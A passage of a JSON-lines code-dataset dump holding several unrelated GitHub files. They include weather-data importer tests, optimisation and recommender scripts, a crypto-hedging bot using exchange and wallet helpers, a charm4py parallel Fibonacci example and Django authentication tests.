datetime(2023, 2, 20, 0), 6, \"ecmwf_hres\", self.config\n )\n\n self.assertEqual(\n nwp_file, \"tests/data/nwp_dir/ecmwf_hres/A1S02200000022006001-99\"\n )\n\n def test_io_import_nwp_tl_ens_grib_compressed(self):\n \"\"\"Tests import of a compressed grib file\"\"\"\n nwp_file = import_nwp_grib(\n datetime(2023, 10, 19, 0), 1, \"wrf_tl_ens\", self.config\n )\n\n self.assertEqual(\n sorted(nwp_file)[0],\n \"tests/data/nwp_dir/wrf_tl_ens/tl_ens-03-001.2023101900_01.grib\",\n )\n self.assertEqual(len(nwp_file), 12)\n\n # Double test to check re-use of already extracted files from a .tar.gz\n nwp_file = import_nwp_grib(\n datetime(2023, 10, 19, 0), 4, \"wrf_tl_ens\", self.config\n )\n\n self.assertEqual(\n sorted(nwp_file)[0],\n \"tests/data/nwp_dir/wrf_tl_ens/tl_ens-03-001.2023101900_04.grib\",\n )\n self.assertEqual(len(nwp_file), 12)\n\n def test_io_import_nwp_grib_model_not_lt_digits(self):\n \"\"\"Tests import of a comprsessed model without src_tar\"\"\"\n with self.assertRaises(KeyError) as err:\n import_nwp_grib(datetime(2022, 11, 7, 0), 2, \"no_lt_digits\", self.config)\n\n self.assertEqual(\n err.exception.args[0],\n \"If named argument {lt} in \"\n \"'src', then 'lead_time_digits' must be \"\n \"specified.\",\n )\n\n def test_io_import_nwp_conflicting_lead_times(self):\n \"\"\"Tests importing files with conflicting lead times\n (ex 12 and 120)\"\"\"\n nwp_file = import_nwp_grib(\n datetime(2022, 11, 19, 0), 12, \"wrf_gfs_3\", self.config\n )\n self.assertTrue(isinstance(nwp_file, str))\n self.assertNotEqual(nwp_file, \"tests/data/nwp_dir/WRFPRS_d01.120\")\n\n # def test_io_import_nwp_file_not_in_tar(self):\n # \"\"\"Tests importing files with conflicting lead times\n # (ex 12 and 120)\"\"\"\n # modified_config = deepcopy(self.config)\n # modified_config['moloch_ecm']['src'] = 'wrong_file_name'\n\n # nwp_file = import_nwp_grib(\n # datetime(2022, 11, 7, 0), 0, \"moloch_ecm\", modified_config\n # )\n # self.assertTrue(isinstance(nwp_file, str))\n # self.assertNotEqual(nwp_file, \"tests/data/nwp_dir/WRFPRS_d01.120\")\n\n def tearDown(self) -> None:\n for f_dir in glob(self.config[\"nwp_dir\"] + \"/*\"):\n rmtree(f_dir)\n return super().tearDown()\n","repo_name":"meteocat/unimodel","sub_path":"tests/test_importers_nwp.py","file_name":"test_importers_nwp.py","file_ext":"py","file_size_in_byte":8494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"29822342893","text":"import matplotlib.pyplot as plt\n\n# load file\n#individualsFile = \"allIndividuals.csv\"\nindividualsFile = \"results-server-malices/allIndividuals-p0.01.csv\"\ninfluenceValues = []\nnodesValues = []\n\nwith open(individualsFile, \"r\") as fp :\n\tlines = fp.readlines()\n\t# pop the header\n\theader = lines.pop(0)\n\t\n\tfor line in lines :\n\t\ttokens = line.rstrip().split(',')\n\t\tinfluenceValues.append( float(tokens[0]) )\n\t\tnodesValues.append( float(tokens[1]) )\n\t\t\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nax.set_title(\"NSGA-II\")\nax.set_xlabel(\"influence\")\nax.set_ylabel(\"nodes in the seed set\")\nax.plot(influenceValues, nodesValues, 'bo')\nplt.savefig(individualsFile[:-4] + \".png\")\n","repo_name":"albertotonda/Influence-Maximization","sub_path":"src_OLD/multiObjective-inspyred/plot-individuals.py","file_name":"plot-individuals.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"85"} +{"seq_id":"70410055638","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\n * Implementation of simulated annealing for multi objective discrete problems.\r\n * \r\n * Description : Graphically solve the problems contained in kp directory\r\n * Display the results continuously in the terminal.\r\n * Convert all the problems to 2 objectives problems in graphical mode.\r\n * So it can be ploted.\r\n * \r\n * Author : Thibault Charmet\r\n * Creation date : 01/2020\r\n\"\"\"\r\n\r\nimport os\r\nimport numpy as np\r\nimport json\r\nimport time\r\nfrom random import random, randint\r\nimport math\r\nfrom matplotlib import pyplot as plt\r\nfrom operator import itemgetter\r\n\r\n# does the program displays graĥical evolution of the results\r\n# if true the number of objectives will be brought to 2\r\ngraphical = True\r\n# if true generate a plot window for each solution\r\none_window_by_solution = False\r\n# maximum number of problems to solve (-1 means everything)\r\nmax_files = -1\r\n\r\n# directory where the problems can be found\r\n# http://home.ku.edu.tr/~moolibrary/kp.zip\r\ndirectory = \"kp\"\r\n\r\n# algorithm parameters\r\nalpha = 0.99\r\nTmax = 300\r\nTmin = 10e-5\r\nequilibre = 20\r\n\r\n# solve discete knapsack problems contained in the kp directory \r\nfiles = [f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory, f)) and f.endswith(\".dat\")]\r\n# limit the number of files\r\nfiles = files[0:max_files]\r\nprint(files)\r\n\r\n\r\ndef read_file(filename):\r\n \"\"\"\r\n read a file of format\r\n number of objectives\r\n number of objects to choose from\r\n capactity of the knapsack (max weight supported)\r\n values of the different objects to pick (one column by object)\r\n last line is the weights of the differents objects to pick\r\n \"\"\"\r\n with open(filename, 'r') as stream:\r\n objectives = int(stream.readline().rstrip()) \r\n if graphical:\r\n # bring it to 2 dimentions for display purpose\r\n objectives = 2\r\n objects = int(stream.readline().rstrip())\r\n capacity = int(stream.readline().rstrip())\r\n lines = stream.readlines()\r\n weights = lines[-1]\r\n # using json to convert to list\r\n weights = json.loads(weights)\r\n del lines[-1]\r\n values = json.loads(\"\".join(lines))\r\n if graphical:\r\n values = values[0:2]\r\n return objectives, objects, capacity, weights, values\r\n \r\n\r\ndef approximate_objective(X):\r\n \"\"\"global objective function that approximate\r\n a value that consider all objectives functions\"\"\"\r\n somme = 0\r\n for xn in X:\r\n for i in range(objectives):\r\n somme += math.log(values[i][xn])\r\n return somme\r\n\r\n\r\ndef voisin(X):\r\n \"\"\"Find all the neighbour of a point.\r\n Here a point is a knapsack configuration.\r\n Return a slightly modified version of the knapsack.\"\"\"\r\n res = list(X)\r\n # either remove of add element\r\n if (len(X) == 0) or (randint(0, 1) == 0):\r\n # adding\r\n # if not exceding capacity\r\n if sum(map(lambda xn : weights[xn], X)) < capacity:\r\n sX = set(X)\r\n sX.add(randint(0, objects-1))\r\n res = list(sX)\r\n else:\r\n # removing\r\n if len(X) > 1:\r\n del res[randint(0, len(X)-1)]\r\n return res\r\n\r\n\r\ndef dominance(Xa, Xb):\r\n \"\"\"\r\n X1 dominates X2 if\r\n - X1 is at least as good as X2 in all objectives\r\n - X1 is strictly better than X2 in, at least, one objective.\r\n \"\"\"\r\n as_good = True\r\n superior = False\r\n for i in range(objectives):\r\n scoreA = sum(values[i][xa] for xa in Xa)\r\n scoreB = sum(values[i][xb] for xb in Xb)\r\n as_good = as_good and scoreA >= scoreB\r\n superior = superior or scoreA > scoreB\r\n return as_good and superior\r\n\r\n# test it\r\n# print(dominance([8, 4, 7], [8, 4, 7]))\r\n\r\ndef clean(domine, pareto_front):\r\n \"\"\"remove all dominated elements from the pareto front\"\"\"\r\n for elt in domine:\r\n pareto_front.remove(elt)\r\n return pareto_front\r\n\r\n\r\ndef annealing(objectives, objects, capacity, weights, values, fig=None, line1=None, line2=None):\r\n \"\"\"simulated annealing algorithm\"\"\"\r\n # X = (x1, x2, ...)\r\n X = [0]\r\n fX = approximate_objective(X)\r\n # all points that are not dominated\r\n pareto_front = [X]\r\n # list of the points previously in the pareto front\r\n archive_pareto = []\r\n T = Tmax\r\n\r\n # create a figure for the problem\r\n if graphical:\r\n abss = [sum(values[0][x] for x in point) for point in pareto_front]\r\n ordo = [sum(values[1][x] for x in point) for point in pareto_front]\r\n if not fig or not line2 or not line2:\r\n plt.ion()\r\n fig = fig or plt.figure()\r\n ax = fig.add_subplot(111)\r\n line2, = ax.plot(abss, ordo, 'go')\r\n line1, = ax.plot(abss, ordo, '-o')\r\n plt.xlim([0, 1.2 * max(abss)])\r\n plt.ylim([0, 1.2 * max(ordo)])\r\n\r\n while T > Tmin :\r\n # constant temperature\r\n for i in range(equilibre):\r\n voisin_X = voisin(X)\r\n voisin_fX = approximate_objective(voisin_X)\r\n # determine if we accept a (sometimes slightly worse) solution\r\n delta = voisin_fX - fX\r\n if (delta < 0) or (random() < math.exp(-delta/T)):\r\n X = voisin_X\r\n fX = approximate_objective(X)\r\n # check if the new solution have a dominance on something\r\n if X not in pareto_front:\r\n # list of all points dominated by the new one\r\n domine = []\r\n dominated = False\r\n for point in pareto_front:\r\n if dominance(X, point):\r\n domine.append(point)\r\n if dominance(point, X):\r\n dominated = True\r\n # if the new point was never dominated we add it to the pareto front\r\n if not dominated:\r\n pareto_front = clean(domine, pareto_front)\r\n pareto_front.append(X)\r\n archive_pareto.append(X)\r\n\r\n # update plot\r\n if graphical:\r\n # compute old pareto values\r\n abss = [sum(values[0][x] for x in point) for point in pareto_front]\r\n ordo = [sum(values[1][x] for x in point) for point in pareto_front]\r\n # we sort so they appear in an order nice to see\r\n # and the lines between each points are not a mess\r\n abss, ordo = [list(x) for x in zip(*sorted(zip(abss, ordo), key=itemgetter(0)))]\r\n # set the new limits of the window\r\n plt.xlim([0, 1.2 * max(abss)])\r\n plt.ylim([0, 1.2 * max(ordo)])\r\n # compute old pareto values\r\n old_abss = [sum(values[0][x] for x in point) for point in archive_pareto]\r\n old_ordo = [sum(values[1][x] for x in point) for point in archive_pareto]\r\n # plot new and old points\r\n line2.set_xdata(old_abss)\r\n line2.set_ydata(old_ordo)\r\n line1.set_xdata(abss)\r\n line1.set_ydata(ordo)\r\n # update the plot and take care of window events (like resizing etc.)\r\n fig.canvas.flush_events()\r\n # wait for next loop iteration\r\n time.sleep(0.01)\r\n\r\n # update temperature\r\n T *= alpha\r\n return pareto_front, fig, line1, line2\r\n\r\n\r\n\r\nfig, line1, line2 = None, None, None\r\nfor i, filename in enumerate(files):\r\n if one_window_by_solution:\r\n fig, line1, line2 = None, None, None\r\n print(\"file {0} of {1}\".format(i+1, len(files)))\r\n filename = os.path.join(directory, filename)\r\n objectives, objects, capacity, weights, values = read_file(filename)\r\n print(\"objectives\", objectives)\r\n print(\"objects\", objects)\r\n print(\"capacity\", capacity)\r\n print(\"values\", values)\r\n print(\"weights\", weights)\r\n pareto_front, fig, line1, line2 = annealing(objectives, objects, capacity, weights, values, fig, line1, line2)\r\n print(\"pareto front : \", str(pareto_front))\r\n\r\n\r\n\r\n\r\n","repo_name":"Chthi/Optimisation","sub_path":"multi_objective_annealing.py","file_name":"multi_objective_annealing.py","file_ext":"py","file_size_in_byte":8283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"13228104042","text":"from offline.data_preprocess import DataPreprocess\nfrom deepctr.feature_column import SparseFeat, VarLenSparseFeat, get_feature_names\nfrom deepctr.models.deepfm import FM\nimport tensorflow.keras as keras\n\nuser_num = 4691\nmovie_num = 2514\nyear_num = 76\ngenre_num = 9\n\nembedding_size = 16\nepoch = 5\nbatch_size = 512\n\ndata_process = DataPreprocess()\ntrain_dataset, test_dataset = data_process.generate_data(batch_size=batch_size, epoch=epoch)\n\nfeature_columns = [SparseFeat(\"user_id\", vocabulary_size=user_num, embedding_dim=embedding_size),\n SparseFeat(\"movie_id\", vocabulary_size=movie_num, embedding_dim=embedding_size),\n SparseFeat(\"current_label\", vocabulary_size=genre_num, embedding_dim=embedding_size),\n SparseFeat(\"release_year\", vocabulary_size=year_num, embedding_dim=embedding_size),\n ]\n\nfeature_columns += [VarLenSparseFeat(\n SparseFeat(\"user_recent_click_movie_ids\", vocabulary_size=movie_num, embedding_dim=embedding_size,\n embedding_name='movie_id'), maxlen=20),\n VarLenSparseFeat(\n SparseFeat(\"user_recent_click_labels\", vocabulary_size=genre_num, embedding_dim=embedding_size,\n embedding_name='current_label'), maxlen=20),\n VarLenSparseFeat(\n SparseFeat(\"user_like_genres\", vocabulary_size=genre_num, embedding_dim=embedding_size,\n embedding_name='current_label'), maxlen=2),\n]\n\ndnn_feature_columns = feature_columns\nlinear_feature_columns = feature_columns\n\nfeature_names = get_feature_names(linear_feature_columns + dnn_feature_columns)\n\nmodel = FM(linear_feature_columns, dnn_feature_columns, task='binary')\nmodel.summary()\nmodel.compile(optimizer=\"adam\", loss=keras.losses.binary_crossentropy, metrics=[\"accuracy\"])\n\nmodel.fit(train_dataset, epochs=epoch, steps_per_epoch=1270010 // batch_size + 1,\n validation_data=test_dataset, validation_steps=159256 // batch_size + 1,\n )\n","repo_name":"nicaibutou1993/ZimuRecSys","sub_path":"offline/rank/tasks/task_fm_by_deepctr.py","file_name":"task_fm_by_deepctr.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"72107191318","text":"import collections\n\nschedule = [(6, 8), (7, 10), (11, 12), (6, 7), (10, 12), (8, 10), (7, 8), (8, 9), (9, 12),\n (9, 10), (6, 12), (10, 11)]\n\n\n# solution 1\ndef find_best_time():\n schedule.sort()\n time_dict = []\n for i in schedule:\n # i[0] i[1] 의 차이만큼 dict에 1씩 추가. i[0] <= < i[1]\n for j in range(i[0], i[1]):\n time_dict.append(j)\n print('celebs\\' time ::', time_dict)\n cnt = collections.Counter(time_dict)\n print('end?', cnt) # Counter({9: 5, 7: 4, 8: 4, 10: 4, 11: 4, 6: 3})\n print('end?', cnt.most_common(1)) # [(9, 5)]\n print('best time to meet celebrities is', cnt.most_common(1)[0][0], 'o\\' clock') # 9\n\n\n# solution 2\ndef fine_best_time2():\n schedule.sort()\n time_dict = []\n index = 0\n while index < len(schedule):\n for i in range(schedule[index][0],\n schedule[index][1]):\n time_dict.append(i)\n index += 1\n answer = collections.Counter(time_dict).most_common(1)[0][0]\n print('best time to meet celebrities is', answer, 'o\\' clock')\n\n\n# find_best_time()\nfine_best_time2()\n","repo_name":"mand2/python-study","sub_path":"day03/p02.py","file_name":"p02.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18651160346","text":"#In this version of \"Bot saves princess\", Princess Peach and bot's position are randomly set. Can you save the princess?\n\n#\n\ndef nextMove(n,r,c,grid):\n nn=n-1\n m=int(n/2)\n x=0\n xx=0\n yy=0\n\n notFound=True\n while(notFound):\n y=0\n while(y0):\n return(\"RIGHT\")\n \n \n elif(yy<0):\n return(\"UP\")\n elif(yy>0):\n return(\"DOWN\")\n\nn = int(input())\nr,c = [int(i) for i in input().strip().split()]\ngrid = []\nfor i in range(0, n):\n grid.append(input())\n\nprint(nextMove(n,r,c,grid))\n","repo_name":"cpamieta/547-202","sub_path":"Artificial Intelligence Exercise/Bot Building/Bot saves princess - 2.py","file_name":"Bot saves princess - 2.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"26123009167","text":"from asyncio import futures\r\nfrom asyncio.windows_events import NULL\r\nfrom decimal import Decimal\r\nfrom hashlib import new\r\nfrom unicodedata import decimal\r\nfrom web3 import Web3\r\nfrom status import WalletStatus, GateStatus\r\nfrom allocation import Allocation\r\nimport baseInfo as bi\r\nimport time\r\nimport multiprocessing as mp\r\nimport math\r\n\r\n\r\n'''\r\nundone note:\r\n0. send USDT to Gate or Wallet is undone!!!\r\n1.check cake balance and choose use ord balance\r\n2.rebalance function\r\n3.append addHedging function\r\n4.step 8 mp.Process\r\n5.gas check function\r\n'''\r\n\r\n# wallet,\r\n# prvkey, #alloctaion only\r\n# pid_ = 0, #walletStatus only\r\n# contractDice=[],\r\n# tokenDict={},\r\n# mainnet='https://bsc-dataseed3.binance.org/'\r\n\r\nwallet = bi.wallet\r\ngateWallet = bi.gateBepWallet\r\nprvkey = bi.prvkey\r\npid_ = 0\r\n\r\ncakePoolsContract = bi.contractDice['nomalCake']\r\ncakeSwapContract = bi.contractDice['swapToken']\r\nusdtContract = bi.contractDice['sendUSDT']\r\ngetPairContract = bi.contractDice['getPair']\r\n\r\ntokenDict = bi.tokenDict\r\nmainnet = bi.mainnet['bsc']\r\n\r\ngateStatus = GateStatus(bi.gateKey, bi.gateSecret)\r\nwalletStatus = WalletStatus(wallet, pid_, tokenDict, mainnet)\r\nallocation = Allocation(wallet, prvkey, walletStatus.getGasBalance(), tokenDict, mainnet)\r\n\r\ndef fromWei(wei,unit):\r\n return walletStatus.web3.fromWei(wei, unit)\r\n\r\ndef toWei(wei,unit):\r\n return walletStatus.web3.toWei(wei, unit)\r\ndef updateGasBalance():\r\n allocation.gasBalance = int(walletStatus.getGasBalance())\r\n\r\ndef totalBalanceInfo():\r\n gateSpotBalance = Decimal(gateStatus.getBalance('USDT','spot'))\r\n gateFuturesBalance = Decimal(gateStatus.getBalance('USDT','futures'))\r\n walletUSDTBalance = Decimal(fromWei(walletStatus.getTokenBalance('USDT'),'ether'))\r\n walletCAKEBalance = Decimal(fromWei(walletStatus.getTokenBalance('CAKE'),'ether'))\r\n walletGasBalance = Decimal(fromWei(walletStatus.getGasBalance(),'ether'))\r\n usingCake = walletStatus.getCakePools(cakePoolsContract)\r\n staked = Decimal(fromWei(usingCake['staked'],'ether'))\r\n pending = Decimal(fromWei(usingCake['pending'],'ether'))\r\n\r\n # print('Gate USDT balance: {},\\nwallet USDT balance: {},\\nstaked balance: {},\\npending balance: {},\\nfutures balance: {},\\nGas balance: {}'\\\r\n # .format(gateSpotBalance,walletUSDTBalance, staked,pending, gateFuturesBalance,walletGasBalance))\r\n\r\n return {'gateSpotBalance':gateSpotBalance,'walletUSDTBalance':walletUSDTBalance,'walletCAKEBalance':walletCAKEBalance,\r\n 'staked':staked,'pending':pending,'futuresBalance':gateFuturesBalance,'walletGasBalance':walletGasBalance}\r\n\r\ndef swapToken(tokenA,tokenB,amount,slip=0):\r\n #Swap token\r\n amountWei = toWei(amount,'ether')\r\n minWei = toWei(amount*slip,'ether')\r\n txnHash = allocation.swapToken(cakeSwapContract,wallet,tokenDict[tokenA][0],tokenDict[tokenB][0],amountWei,minWei)\r\n return txnHash\r\n\r\ndef buyGas(amount):\r\n usdtAmount = toWei(amount,'ether')\r\n txnHash = allocation.buyGas(cakeSwapContract,wallet,tokenDict['USDT'][0],tokenDict['BNB'][0],usdtAmount,0)\r\n return txnHash\r\n\r\n\r\ndef getTransactionReceipt(txnHash):\r\n waitingTimes = 0\r\n while True:\r\n # waiting for transaction receipt\r\n time.sleep(5)\r\n status = walletStatus.getTransactionReceipt(txnHash,waitingTimes)\r\n if status == None:\r\n print('waiting transaction...')\r\n waitingTimes += 1\r\n continue\r\n print('transaction done')\r\n return status\r\n\r\n\r\n\r\n'''\r\n1.get total balance\r\n2.set hedging balance\r\n3.balance USDT\r\n4.transfer USDT to Gate futures\r\n5.buy CAKE and sell CAKE_USDT at same time\r\n6.check CAKE balance and Gas balance\r\n7.stake cake in pools\r\n8.check two account balance\r\n/* for loop 8. */\r\nif futures balance lost 75% then rebalance\r\n'''\r\n\r\ndef newHedging( hedgingBalance:Decimal,cryptocurrency='CAKE'):\r\n # step 1 & 2\r\n totalBalance = totalBalanceInfo()\r\n updateGasBalance()\r\n available = (totalBalance['gateSpotBalance']+totalBalance['walletUSDTBalance'])\r\n if hedgingBalance > available:\r\n print('available balance is not enough.')\r\n return False\r\n halfBalance = Decimal(hedgingBalance/2)\r\n walletDiff = totalBalance['walletUSDTBalance'] - (halfBalance)\r\n ExDiff = totalBalance['gateSpotBalance'] - (halfBalance)\r\n # print(walletDiff,ExDiff)\r\n # step 3 \r\n if walletDiff < 0:\r\n # wallet balance not enough ,need transfer USDT to wallet\r\n # Gate to binance to wallet\r\n print('wallet USDT balance is not enough.')\r\n pass\r\n elif ExDiff < 0:\r\n # gate balance not enough ,need transfer USDT to gate\r\n print('Gate USDT balance is not enough.')\r\n pass\r\n \r\n #step 4\r\n isSuccess = gateStatus.transfers('USDT','spot','futures',halfBalance)\r\n if not isSuccess :\r\n print('Gate transfer fail.')\r\n return False\r\n print('transfer USDT to futures')\r\n #step 5 & 6\r\n # swap tokenA to tokenB\r\n txnHash = swapToken('USDT','CAKE',halfBalance)\r\n if txnHash == 'gas fail':\r\n print('gas balance is not enough.')\r\n return False\r\n updateGasBalance()\r\n print('swap hash: ',txnHash)\r\n # waiting for transaction receipt\r\n swapStatus = getTransactionReceipt(txnHash)\r\n if swapStatus['status'] == 0:\r\n print('Swap rejected.')\r\n isSuccess = gateStatus.transfers('USDT','futures','spot',halfBalance)\r\n if not isSuccess :\r\n print('Gate transfers back fail. please manual transfer balance')\r\n return False\r\n elif swapStatus['status'] == 1:\r\n print('Swap success')\r\n else:\r\n print('unkown error')\r\n return False\r\n # buy short CAKE_USDT\r\n futruesPrice = gateStatus.getFuturesPrice('CAKE_USDT')\r\n # choose market price or limit price (?\r\n size = halfBalance/Decimal(futruesPrice['mark_price'])\r\n size = math.floor(size*10)\r\n print('order size: ',-size)\r\n futuresOrder = gateStatus.orderFutures('CAKE_USDT',-size,0) # 0 is market price, limit price is futruesPrice['last_price']\r\n cake = walletStatus.getTokenBalance('CAKE')\r\n print('cake: {}\\nfutures: {}\\nGas: {}'.format(fromWei(cake,'ether'),gateStatus.getBalance(acc='futures'),walletStatus.getGasBalance()))\r\n\r\n #step 7\r\n gasPrice = 5\r\n while True:\r\n txnHash = allocation.cakeEnterStaking(cakePoolsContract,cake,gasPrice)\r\n if txnHash == 'gas fail':\r\n print('gas balance is not enough.')\r\n return False\r\n print('Staking hash: ',txnHash)\r\n stakeStatus = getTransactionReceipt(txnHash)\r\n if stakeStatus['status'] == 0:\r\n updateGasBalance()\r\n print('Staking rejected. boost gas try again gas price: '+gasPrice)\r\n if gasPrice >= 7 : \r\n print('Gas too high. quit staking ,please manual staking')\r\n return False\r\n gasPrice += 1\r\n continue\r\n elif stakeStatus['status'] == 1:\r\n print('staking success')\r\n break\r\n else:\r\n print('unkown error')\r\n return False\r\n return True\r\n\r\n#step 8 monitor balance, close true: liquidation, false: rebalance\r\n# use mp.Process(target = function, args = **args) make check function?\r\ndef monitor(close=True):\r\n while True:\r\n totalbalance = totalBalanceInfo()\r\n usingCAKE = totalbalance['staked']+totalbalance['pending']\r\n cakePrice = Decimal(gateStatus.getFuturesPrice('CAKE_USDT')['mark_price'])\r\n stakingUSDT = usingCAKE*cakePrice\r\n futuresUSDT = Decimal(totalbalance['futuresBalance'])\r\n liqPrice = Decimal(gateStatus.getLiqPrice('CAKE_USDT')['liq_price'])\r\n print('staking CAKE balance: {}\\nstaking USDT balance: {}\\nfutures USDT balance: {}\\nlast CAKE price: {}\\nliquidation price: {}\\ntotal balance: {}'\\\r\n .format(usingCAKE,stakingUSDT,futuresUSDT,cakePrice,liqPrice,stakingUSDT+futuresUSDT))\r\n if (cakePrice*Decimal(1.2)) > liqPrice:\r\n if close:\r\n #cancel function\r\n print('liquidation position')\r\n withdrawalHedging()\r\n else:\r\n #rebalance function\r\n print('rebalance')\r\n print('----'*10)\r\n time.sleep(5)\r\n\r\ndef withdrawalHedging(cryptocurrency='CAKE'):\r\n # withdrawal all balance\r\n stakedCake = walletStatus.getCakePools(cakePoolsContract)\r\n if stakedCake['staked'] != 0:\r\n txnHash = allocation.cakeLeaveStaking(cakePoolsContract,stakedCake['staked'])\r\n updateGasBalance()\r\n if txnHash == 'gas fail':\r\n print('gas balance is not enough.')\r\n return False\r\n print('leave hash: ',txnHash)\r\n leaveStatus = getTransactionReceipt(txnHash)\r\n if leaveStatus['status'] == 0:\r\n print('leaving rejected. please manual leaving')\r\n return False\r\n elif leaveStatus['status'] == 1:\r\n print('leaving success')\r\n time.sleep(5)\r\n else:\r\n print('unkown error')\r\n return False\r\n\r\n totalBalance = totalBalanceInfo()\r\n cake = totalBalance['walletCAKEBalance']\r\n print('leaving pools cake balance: ',cake)\r\n txnHash = swapToken('CAKE','USDT',cake)\r\n updateGasBalance()\r\n if txnHash == 'gas fail':\r\n print('gas balance is not enough.')\r\n return False\r\n print('swap hash: ',txnHash)\r\n swapStatus = getTransactionReceipt(txnHash)\r\n if swapStatus['status'] == 0:\r\n print('swap rejected. please manual swap or try again')\r\n return False\r\n elif swapStatus['status'] == 1:\r\n print('swap success')\r\n else:\r\n print('unkown error')\r\n return False\r\n\r\n totalBalance = totalBalanceInfo()\r\n liq = gateStatus.getLiqPrice()\r\n futuresOrder = gateStatus.orderFutures('CAKE_USDT',-liq['size'],0) # 0 is market price, limit price is futruesPrice['last_price']\r\n isSuccess = gateStatus.transfers('USDT','futures','spot',totalBalance['futuresBalance'])\r\n if not isSuccess :\r\n print('Gate transfer fail.please manual transfer balance')\r\n\r\n print('wallet CAKE balance: {}\\nwallet USDT balance: {}\\nGate.io futures balance: {}\\n Gate.io spot balance: {}\\norder status: {}'\\\r\n .format(totalBalance['walletCAKEBalance'],\r\n totalBalance['walletUSDTBalance'],\r\n totalBalance['futuresBalance'],\r\n totalBalance['gateSpotBalance'],\r\n futuresOrder['status']))\r\n\r\n\r\n\r\nmonitor()","repo_name":"eric0000567/crypto","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"28738670941","text":"from charm4py import charm, coro, Chare, Group\nimport time\nimport numba\n\n# Recursive Parallel Fibonacci\n# This example is meant to illustrate the use of charm.pool and nested\n# parallelism (creating parallel tasks from other parallel tasks).\n\n# NOTE that the grainsize is a critical parameter for performance. The fibonacci\n# number is calculated in a parallel recursive manner by spawning parallel\n# tasks until n <= GRAINSIZE, at which point fib(n) is calculated on the process\n# where the task is running using a sequential algorithm JIT-compiled with Numba.\n# - If GRAINSIZE is too low, *many* tasks will be spawned and you will pay the\n# cost of creating them, scheduling and communication.\n# - If GRAINSIZE is too high, you might not get a sufficient number of tasks to\n# achieve high parallel efficiency (this depends on how many cores you are\n# running on).\n\n\n@coro\ndef fib(n):\n if n <= GRAINSIZE:\n return fib_seq(n)\n else:\n # this will create two tasks which will be sent to distributed workers\n # (tasks can execute on any PE). map will block here for the result of\n # fib(n-1) and fib(n-2), which is why we mark fib as a coroutine\n return sum(charm.pool.map(fib, [n-1, n-2]))\n\n\n@numba.jit(nopython=True, cache=False) # numba really speeds up the computation\ndef fib_seq(n):\n if n < 2:\n return n\n else:\n return fib_seq(n-1) + fib_seq(n-2)\n\n\nclass Util(Chare):\n def compile(self):\n fib_seq(3)\n\n\ndef main(args):\n global GRAINSIZE\n print('\\nUsage: fib-numba.py [n] [grainsize]')\n n = 40\n if len(args) > 1:\n n = int(args[1])\n GRAINSIZE = n - 5\n if len(args) > 2:\n GRAINSIZE = int(args[2])\n GRAINSIZE = max(2, GRAINSIZE)\n # set GRAINSIZE as a global variable on all processes before starting\n charm.thisProxy.updateGlobals({'GRAINSIZE': GRAINSIZE}, awaitable=True).get()\n # precompile fib_seq on every process before the actual computation starts,\n # by calling the function. this helps get consistent benchmark results\n Group(Util).compile(awaitable=True).get()\n print('Calculating fibonacci of N=' + str(n) + ', grainsize=', GRAINSIZE)\n t0 = time.time()\n result = fib(n)\n print('Result is', result, 'elapsed=', round(time.time() - t0, 3))\n exit()\n\n\ncharm.start(main)\n","repo_name":"UIUC-PPL/charm4py","sub_path":"examples/fibonacci/fib-numba.py","file_name":"fib-numba.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","stars":281,"dataset":"github-code","pt":"85"} +{"seq_id":"24084075249","text":"import logging\nimport urllib.parse\n\nfrom django.contrib.gis.geos import Point\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\n\n\n\nfrom cities.models import Country, Region, City\n\nlogger = logging.getLogger(__name__)\n\nregister_url = \"/auth/users/\"\nlogin_url = \"/auth/token/login/\"\nlogout_url = \"/auth/token/logout/\"\ntips_url = \"/tips/\"\ncities_url = \"/cities/\"\n\ndef get_tip_put_url(tip_id):\n return urllib.parse.urljoin(tips_url, str(tip_id), \"/\") + \"/\"\n\nclass TestUser:\n \"\"\"Defines auth information for a user.\n \"\"\"\n\n def __init__(self, username, email, password):\n self.username = username\n self.email = email\n self.password = password\n\n def register(self, client):\n data = {\n \"username\": self.username,\n \"email\": self.email,\n \"password\": self.password\n }\n return client.post(register_url, data, format=\"json\")\n\n def login(self, client):\n data = {\n \"username\": self.username,\n \"password\": self.password\n }\n response = client.post(login_url, data, format=\"json\")\n logger.debug(\"Login response: %s\", response)\n token = response.data[\"auth_token\"]\n client.credentials(HTTP_AUTHORIZATION='Token ' + token)\n return response\n\n def logout(self, client):\n response = client.post(logout_url)\n client.credentials()\n return response\n\nclass AuthTests(APITestCase):\n\n def test_register_and_login(self):\n user = TestUser(\"titi\",\n \"titi@test.com\",\n \"pouetpouet\")\n response = user.register(self.client)\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n response = user.login(self.client)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_logout(self):\n user = TestUser(\"toto\",\n \"toto@test.fr\",\n \"weshwesh\")\n user.register(self.client)\n user.login(self.client)\n response = user.logout(self.client)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n\nclass TipTests(APITestCase):\n\n def test_get_default_empty(self):\n response = self.client.get(tips_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data[\"results\"]), 0)\n\n def test_post_noauth(self):\n data = {\n \"title\": \"test\",\n \"text\": \"this is a test\",\n }\n response = self.client.post(tips_url, data)\n 